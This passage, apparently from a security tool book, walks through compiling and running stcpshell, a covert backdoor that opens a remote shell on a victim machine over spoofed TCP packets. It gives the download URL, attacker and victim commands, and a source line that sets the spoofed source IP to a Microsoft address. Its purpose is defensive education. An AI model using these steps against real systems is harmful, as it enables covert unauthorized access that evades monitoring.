STCPSHELL

Applying the same principles of covert communication channeling learned from Loki to TCP, a new tool called stcpshell was created. This tool uses spoofed TCP packets to pass information between the client and the server and creates a virtual shell on the victim's computer. Similar to Loki, it also comes packaged as source code and must be compiled.

The stcpshell tool can be downloaded from http://www.datacomm.ch/prutishauser/programming/stcpshell.c.

Implementation

Because the tool needs to be compiled before it can be used, you must create the tool on a machine with such capability. If this machine is not the victim machine, you should add a -static command to the compilation line before the -o switch. The compilation process can be executed with the following command:

 attacker# gcc -o stcpshell stcpshell.c 

The server is started by typing this:

 victim# ./stcpshell 

You can then connect from the client to the server by typing this:

 attacker# ./stcpshell -c <  server IP address  > <  client IP address  > 

The connection can be viewed in the next screenshot. Notice how the commands are executed as if you were sitting at the victim server.

The session between the client and server can be viewed in Figure 10-7, which presents traffic captured by Ethereal. Notice how the traffic between the client and server has a default spoofed IP address of 207.46.131.137. Furthermore, the ports chosen for the connection are 1234 and 4321 ( reported as rwhois, which has a default port of 4321). The ports and spoofed IP addresses can all be changed within the tool's source code, which can be located in the following lines within stcpshell.c:

 /* from www.microsoft.com .. you BETTER change this */     pkt.ip.ip_src.s_addr=inet_addr("207.46.131.137"); 

Figure 10-7: Stcpshell and traffic captured by Ethereal


Anti-Hacker Tool Kit
Anti-Hacker Tool Kit, Third Edition
ISBN: 0072262877
EAN: 2147483647
Year: 2006
Pages: 175

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net